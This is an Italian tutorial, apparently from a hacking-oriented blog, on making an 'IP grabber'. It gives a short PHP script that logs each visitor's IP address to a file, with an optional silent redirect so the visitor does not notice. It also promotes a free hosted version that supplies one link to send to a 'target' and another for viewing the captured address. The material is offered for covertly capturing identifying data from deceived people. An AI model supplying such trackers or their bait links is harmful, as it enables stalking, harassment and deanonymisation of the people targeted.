Selezione_013

Ciao a tutti, oggi vi spiegherò come potete facilmente creare un IP grabber.




Cos’è un IP grabber?

Un IP grabber, è un particolare software (In questo caso scritto in php) che permette di trovare / rubare e salvare l’ip di qualcuno che visita una determinata pagina web.

EDIT:

Lo staff ha creato un tool per creare automaticamente un ip grabber, che verrà hostato gratuitamente presso i nostri server. CLICCA QUI per andare al tool
[nuova versione! appena riasciata].


Crearlo è molto semplice: basta salvare alcune stringhe in un file con estensione .php e poi uploadarlo su un server che supporti il php.

Vediamo in dettaglio i passi da seguire:

1) Copiare e incollare il seguente codice in un file .php

<?php
$ip = getenv ('REMOTE_ADDR');
$fp = fopen('IP.txt', 'a');
fwrite($fp, 'IP: ' .$ip. '');
fclose($fp);
?>

Questo script creerà un file (“IP.txt”) e ci scriverà dentro l’ip del visitatore.

Se volete che chi visita la pagina venga reindirizzato su un altro sito dopo che gli è stato “sottratto” l’ip dovete aggiungere il “costrutto” header, in questo modo:

<?php
header("Location: http://www.sito.it");
$ip = getenv ('REMOTE_ADDR');
$fp = fopen('IP.txt', 'a');
fwrite($fp, 'IP: ' .$ip. '');
fclose($fp);
?>

E ovviamente al posto di “www.sito.it” dovrete inserire l’url (indirizzo) del sito su cui volete che l’utente venga reindirizzato.

2) Una volta che avrete creato questo modulo dovrete uploadarlo su un server che supporti il linguaggio php. Esistono diversi servizi di hosting gratuito che supportano il linguaggio php, contattateci per avere info in privato.

Se non volete registrarvi su un servizio di web hosting, mettiamo a disposizione un servizio di hosting appositamente per ip grabber.

Per averne a disposizione un modulo preconfigurato, non dovrete fare altro che commentare qui sotto scrivendo il sito web verso il quale volete che la persona venga reindirizzata e compilare il campo “mail” in modo che io vi possa contattare.

Entro 24h verrà attivato il servizio, e riceverete per email due link: il primo quello da dare al vostro bersaglio se così la possiamo chiamarla, e il secondo dove potrete visualizzare il suo indirizzo ip.

La nuova release è pronta, basta clikkare qui e procedere con la registrazione veloce.